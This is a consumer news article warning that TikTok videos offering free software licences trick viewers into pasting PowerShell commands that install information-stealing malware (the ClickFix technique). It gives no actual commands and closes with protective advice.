If a TikTok 'tech tip' tells you to paste code, it's a scam. These videos have been popping up on the platform, tempting users with promises of free software licenses in exchange for a few simple steps. But don't be fooled – they're actually a clever way for hackers to steal your credentials and system information.
TikTok is being exploited as a delivery platform to spread information-stealing malware and other payloads, with free software acting as the bait. This phenomenon was recently highlighted by Senior ISC Handler Xavier Mertens in a post published on the SANS Institute's Internet Storm Center website. Mertens explained that the wave of attacks on TikTok leverages ClickFix social engineering techniques to dupe victims into downloading malware onto their systems.
The scam typically begins with an example video posted by Mertens, which has garnered over 500 likes. In this video, a scammer pretends to provide viewers with an easy way to activate Photoshop for free. The victim is asked to start PowerShell as an administrator and trigger one line of code, which then executes "Updater.exe," which is actually AuroStealer, a Trojan designed to steal credentials and system information.
But that's not all – an additional shellcode is also launched in memory, further compromising the user's device. ZDNET explored TikTok for similar videos and was surprised by how many were live. For instance, in one screenshot, the author was promoting a fake way to download and install Adobe Photoshop without the need for a license.
Other examples we found included fake, free ways to license Microsoft Windows. It's clear that ClickFix is a particularly nasty social engineering technique that tries to bypass traditional anti-phishing protections by tricking users into "hacking" themselves. Instructions are given in one form or another, which could include using a Windows shortcut and copy-pasting a snippet of code into a command prompt to trigger a PowerShell script.
These instructions are laid out in a way that is easy to understand and are given a fake purpose – such as for fixing a minor technical glitch, a way to use paid software for free, or as a "life hack" for improving popular streaming services. Once the victim has unwittingly opened up their device for exploitation, a malicious payload is deployed and executed.
Malware recorded in Clickfix campaigns includes information stealers, Remote Access Trojans (RATs), ransomware, and worms. This is not the first time TikTok and ClickFix have been linked. Back in March, cybersecurity researchers from Trend Micro reported that TikTok videos, potentially generated through AI tools, were being distributed on the platform to spread Vidar and StealC information stealers.
A network of faceless accounts posted videos on topics including improving Spotify and included step-by-step instructions that, instead, launched a PowerShell command to load malware. The researchers noted that "the vast user base and algorithmic reach of social media platforms provide an ideal delivery mechanism for threat actors."
For attackers, this means broad distribution without the logistical burden of maintaining an infrastructure. Earlier this month, Microsoft warned that Clickfix is becoming increasingly popular as a method of infiltrating networks, stealing data, and deploying malware.
In the Redmond giant's latest Digital Defense report, Microsoft said that since 2024, Clickfix tactics have been recorded as a method of initial access in 47% of attacks, ahead of phishing and password "spray and pray" attack methods. So, how can you protect yourself against Clickfix attacks?
Don't execute a command on your device if you are not sure about the source of the code or its true purpose, especially if you find the instructions on social media, where they're unlikely to be vetted. Now that you know this social engineering method exists, stay suspicious. Tell your friends, too.
In conclusion, TikTok is being exploited as a platform for spreading malware and other malicious payloads, using free software as bait. If you see a video promising you free Photoshop or Windows license in exchange for a few simple steps, it's likely a scam. Stay vigilant and protect yourself against these types of attacks by verifying the source of any code or instructions before executing them on your device.